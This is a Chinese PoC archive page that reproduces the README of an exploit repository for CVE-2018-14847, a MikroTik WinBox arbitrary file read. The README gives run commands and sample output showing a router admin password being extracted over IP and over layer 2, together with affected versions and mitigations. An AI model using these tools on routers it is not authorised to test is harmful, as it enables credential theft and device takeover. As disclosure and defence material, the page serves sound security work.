POC详情: d8dd64c214275d6306744185c66b43e1ec5c870b

来源
https://github.com/jas502n/CVE-2018-14847
关联漏洞
标题: Winbox for MikroTik RouterOS 安全漏洞 (CVE-2018-14847)
描述:MikroTik RouterOS是一套路由操作系统。Winbox for MikroTik RouterOS是一个用于管理MikroTik RouterOS系统的应用程序。 Winbox for MikroTik RouterOS 6.42及之前版本中存在安全漏洞。远程攻击者可通过修改请求利用该漏洞绕过身份验证并读取任意文件。
描述
MikroTik RouterOS Winbox未经身份验证的任意文件读/写漏洞
介绍
# WinboxExploit
This is a proof of concept of the critical WinBox vulnerability (CVE-2018-14847) which allows for arbitrary file read of plain text passwords.

## Blogpost
https://n0p.me/winbox-bug-dissection/

## Requirements
- Python 3+

This script will NOT run with Python 2.x or lower.

## How To Use
The script is simple used with simple arguments in the commandline.

#### WinBox (TCP/IP)
Exploit the vulnerability and read the password.
```
python3 WinboxExploit.py <IP-ADDRESS> [PORT]
```
Example:
```
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord
```
![](./scan.jpg)

![](./CVE-2018-14847.jpg)
#### MAC server WinBox (Layer 2)  
You can extract files even if the device doesn't have an IP address.

Simple discovery check for locally connected Mikrotik devices.
```
python3 MACServerDiscover.py
```
Example:
```
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa
```

Exploit the vulnerability and read the password.
```
python3 MACServerExploit.py <MAC-ADDRESS>
```
Example:
```
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

User: admin
Pass: Th3P4ssWord
```

## Vulnerable Versions
All RouterOS versions from 2015-05-28 to 2018-04-20 are vulnerable to this exploit.

Mikrotik devices running RouterOS versions:

- Longterm: 6.30.1 - 6.40.7
- Stable: 6.29 - 6.42
- Beta: 6.29rc1 - 6.43rc3

For more information see: https://blog.mikrotik.com/security/winbox-vulnerability.html

## Mitigation Techniques
- Upgrade the router to a RouterOS version that include the fix. 
- Disable the WinBox service on the router.
- You can restricct access to the WinBox service to specific IP-addresses wtih the following:
```
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
```
- You may use some Filter Rules (ACL) to deny external access to the WinBox service:
```
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
```
- Limiting access to the mac-winbox service can be done by specifing allowed interfaces:
```
/tool mac-server mac-winbox
```

## Copyright
 - Sponsered by Iran's CERTCC(https://certcc.ir). All rights resereved.
文件快照

 [4.0K]  /data/pocs/d8dd64c214275d6306744185c66b43e1ec5c870b
├── [ 81K]  CVE-2018-14847.jpg
├── [1.5K]  extract_user.py
├── [1.1K]  LICENSE
├── [ 991]  MACServerDiscover.py
├── [5.1K]  MACServerExploit.py
├── [  52]  push.sh
├── [4.0K]  __pycache__
│   └── [1.7K]  extract_user.cpython-35.pyc
├── [2.2K]  README.md
├── [218K]  scan.jpg
└── [2.3K]  WinboxExploit.py

1 directory, 10 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。